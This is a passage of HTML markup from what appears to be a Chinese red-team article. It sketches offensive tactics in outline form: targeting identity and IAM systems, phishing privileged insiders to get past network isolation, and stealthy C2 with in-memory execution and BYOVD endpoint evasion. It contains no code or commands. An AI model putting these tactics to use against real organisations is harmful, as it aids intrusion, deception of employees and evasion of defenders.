New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">正资产偏漏洞 vs 偏资产正漏洞</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">正资产的正常漏洞少之又少，例如某集团官网shiro反序列化、淘宝官网RCE，这种概率极低。当然如果真有，以现在的防御水平，攻击者应该考虑这是不是蜜罐。</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">在难突破的场景，可以考虑正资产偏门漏洞以及偏门资产的正漏洞组合来提升攻破概率。夯实渗透基本功</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3.</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">认证类攻击</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白化认证逻辑，无特征</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">除了登录日志也没有攻击流量</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">如果伴随着正常的业务管理行为，增大了排查难度</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">拿到内/外网集权的登录认证比shell更有效</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">减少打漏洞的痕迹，实现收益最大化，集权首屈一指</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(3)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">攻破身份认证类体系</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">e.g. 竹Y、派L、IAM系列，权限和信息都是重要途径，不一定必须shell</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">ZeroTrust系列</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">   </span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">       </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span><o:page></o:page></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.</span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">社工钓鱼</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;"> </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">   </span></h1><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">1.  </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">寻找白名单人员构建高信任</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">2. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白名单人员：能出网的人、具备高权限的人员</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">有些目标主机不出网，但总有出网的主机</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">结合内外网渗透漏洞获得更多的联系人信息，借助邮箱、IM类，定位高权限人，钓关键人，关键人会帮我们成为“代言”，甚至帮我们打掩护，e.g. 运维人员自带突破隔离的效果</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">3. 业务流钓鱼，利用可信流程</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">4. 降低无辜者受害，让有正需求的人响应，满足自己同时满足对方，双赢，定期维护</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">5. ~</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">      </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">6.</span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">木马&amp;维持</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">   </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></h1><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">1. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">C2</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">降特征，内存执行，技术倾白化</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">2. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">终端对抗</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白驱动 BYOVD</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, 